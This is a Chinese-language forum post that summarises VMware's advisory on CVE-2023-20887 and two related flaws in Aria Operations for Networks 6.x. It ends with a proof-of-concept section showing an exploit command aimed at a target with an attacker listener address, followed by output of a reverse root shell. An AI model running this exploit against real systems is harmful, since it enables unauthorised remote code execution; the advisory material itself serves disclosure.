90_ 发表于 2023-6-15 09:28:02

VMware Aria Operations for Networks命令注入漏洞


VMware Aria Operations for Networks (以前称为vRealize Network Insight,vRNI)是一款网络可视性和分析工具,可以帮助管理员优化网络性能或管理和扩展各种VMware和Kubernetes部署。

6月8日,启明星辰VSRC监测到VMware发布安全公告,修复了Aria Operations Networks 6.x中的一个命令注入漏洞(CVE-2023-20887),该漏洞的CVSSv3评分为9.8,对 VMware Aria Operations for Networks 具有网络访问权限的威胁者可以通过执行命令注入攻击,从而导致远程代码执行。

此外,VMware Aria Operations for Networks 6.x中还修复了一个反序列化漏洞(CVE-2023-20888,CVSSv3评分9.1),对Aria Operations for Networks 具有网络访问权限的经过身份验证的恶意用户可以执行反序列化攻击,从而导致远程代码执行;以及修复了另一个信息泄露漏洞(CVE-2023-20889,CVSSv3评分8.8),对Aria Operations for Networks具有网络访问权限的威胁者可以通过执行命令注入攻击,导致信息泄露。

影响范围
VMware Aria Operations Networks版本:6.x

poc:
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

页: [1]
查看完整版本: VMware Aria Operations for Networks命令注入漏洞